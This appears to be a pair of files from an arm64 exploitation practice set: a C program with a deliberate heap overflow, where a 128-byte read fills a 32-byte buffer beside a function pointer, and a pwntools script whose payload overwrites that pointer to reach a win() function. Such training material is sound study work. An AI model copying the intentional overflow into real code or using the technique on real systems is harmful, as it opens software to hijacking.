File: arm64/heap/heap_overflow/1.py
from pwn import *

# buf + addr_of_win

"""
typedef struct {
    char buf[32];    <- buf[32], but read 128!
    void (*fn)(void);    <- overflow buf + write to the fn our addr of win
} chunk;
"""

p = b"A"*32 + p64(0x1000004b0)
print(p)

File: arm64/heap/heap_overflow/1.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

typedef struct {
    char buf[32];
    void (*fn)(void);
} chunk;

void win(void) {
    system("/bin/ls");
}

void safe(void) {
    puts("safe");
}

int main(void) {
    setbuf(stdout, NULL);

    chunk *c = malloc(sizeof(chunk));
    c->fn = safe;

    printf("chunk: %p\n", c);
    printf("win:   %p\n", win);
    printf("safe:  %p\n", safe);
    printf("read:\n");

    read(0, c->buf, 128);

    c->fn();
    return 0;
}
